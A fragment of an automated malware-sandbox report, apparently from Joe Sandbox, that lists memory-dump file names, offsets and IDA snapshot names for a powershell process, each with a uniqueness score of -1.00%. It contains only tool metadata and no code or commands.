                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480323193.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2cbd000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%